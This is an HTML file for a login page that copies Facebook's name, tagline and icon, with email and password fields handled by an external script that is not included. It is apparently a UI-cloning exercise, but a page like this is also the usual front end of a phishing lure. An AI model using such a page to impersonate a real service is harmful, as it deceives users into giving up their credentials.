<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook-like Login Page</title>
    <link rel="stylesheet" href="style.css">
    <link rel="icon" href="facebook-icon.png" type="image/png">
</head>
<body>
    <div class="container">
        <div class="left-section">
            <h1>Facebook</h1>
            <p>Connect with friends and the world around you on Facebook.</p>
            <br><br><br>
        </div>
        <div class="right-section">
            <form class="login-form" id="loginForm">
                <input type="text" placeholder="Email or Phone" id="email" required>
                <input type="password" placeholder="Password" id="password" required>
                <button type="submit">Log In</button>
                <a href="#" class="forgot-password">Forgotten password?</a>
                <div class="divider"></div>
                <button type="button" class="create-account">Create New Account</button>
            </form>
        </div>
    </div>
</body>
<script src="script.js"></script>
</html>
